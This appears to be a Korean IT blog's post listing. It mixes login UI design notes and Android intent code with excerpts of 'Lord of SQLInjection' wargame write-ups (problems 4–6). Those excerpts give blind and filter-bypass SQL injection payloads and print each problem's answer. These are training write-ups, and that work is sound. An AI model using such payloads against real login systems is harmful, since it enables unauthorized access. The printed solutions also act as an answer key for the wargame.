로픽의 IT블로그

Vector Illustration

Adobe XD) Login UI *** 출처 : *** image 출처 : pixabay.com/ko/photos/신부-법률의-아들-결혼식-4615557/ Pixabay의 무료 이미지 - 신부, 법률의 아들, 결혼식, 더블, 사랑, 결혼, 사람들 26 개의 댓글 로그인 을 하여 의견을 남기세요. 신부, 법률의 아들, 결혼식, 더블, 사랑, 결혼, 사람들, 남자, 여성, 로맨스, 행복한, 로맨틱, 드레스, 남성, 크, 소녀, 행복, 축하, 행사, 아내가, 키스, 꽃다발, 잔디, 베, 무료 사진, pixabay.com 색상 : https://color.adobe.com/ko/trends Color wheel, a color palette generator | Adobe Color color.adobe.com

* intent - Activity 전환 class MainActivity : AppCompatActivity() { override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) setContentView(R.layout.activity_main) loginBtn.setOnClickListener { val nextIntent = Intent(this, LoginActivity::class.java) startActivity(nextIntent) } } } * intent - Activity 종료 class LoginActivity : AppCompatActivity() { override fun onCrea..

Lord of Sqlinjection - 6번 darkelf 6번 문제는 정규표현식으로 or, and 를 필터링 합니다. => if(pref_match('/or|and/i', $_GET[pw])) exit("HeHe"); SQL Injection 공격시 공백 문자 필터링 우회 방법 and => %26&26, && or => %7c%7c, || * 크롬 테스트 시, && 문자가 적용이 안되는 경우가 있습니다. 이때 %26%26으로 테스트 하시면 정상 적용가능합니다. 대체문자를 이용해서 or, and 필터링을 우회하면 됩니다. *** 정답 *** 더보기 정답 : ?pw=' || id='admin'%23

Login UI (with. Adobe XD) *** 출처 *** * Adobe XD Design * Android Login Form UI

Login Form 2 (HTML&CSS) *** 출처 : DarkCode - Animated Login Form Using Only HTML & CSS ***

LOGIN Form 1 (HTML&CSS) *** 출처 : DarkCode - Animated Login Form Using HTML & CSS & JQurey ***

Lord of Sqlinjection - 5번 문제 WOLFMAN 5번 문제는 공백을 필터링하는 정규표현식이 추가되었습니다. if(preg_match('\ \i', $_GET[pw])) exit("No whitespace ~_~"); 공백 필터링 정규표현식을 우회하여 Sql 구문을 완성시켜야합니다. SQL Injection 공격시 공백 문자 필터링 우회 방법 1. Tab : %09 - ?pw='%09or%09id='admin' 2. Line Feed (\n): %0a - ?pw='%0aor%0aid='admin' 3. Carrage Return(\r) : %0d - ?pw='%0dor%0did='admin' 4. 주석 : /**/ - ?pw='/**/or/**/id='admin' 5. 괄호 : () - ..

lord of sqlinjection 4번 ORC pw 파라미터 값을 찾아야 풀 수 있는 문제입니다. Hello admin라는 문구가 SQL 쿼리에 참/거짓에 따라 출력되기 때문에 Blind Sql injection을 통해서 pw 파라미터 값을 유추해야합니다. 첫번째, pw 파라미터의 length를 확인합니다. 두번째, brute force로 pw 파라미터 값을 찾습니다. *** 정답 *** 더보기 패스워드 길이 : ?pw=1' or length(pw)=8%23 패스워드 확인(1자리씩) : ?pw=1' or id='admin' and ASCII(SUBSTR(pw, 자리수, 1))=아스키코드%23 패스워드 : 295d5844 id='admin' and pw='1' -> false length(pw)=8 -..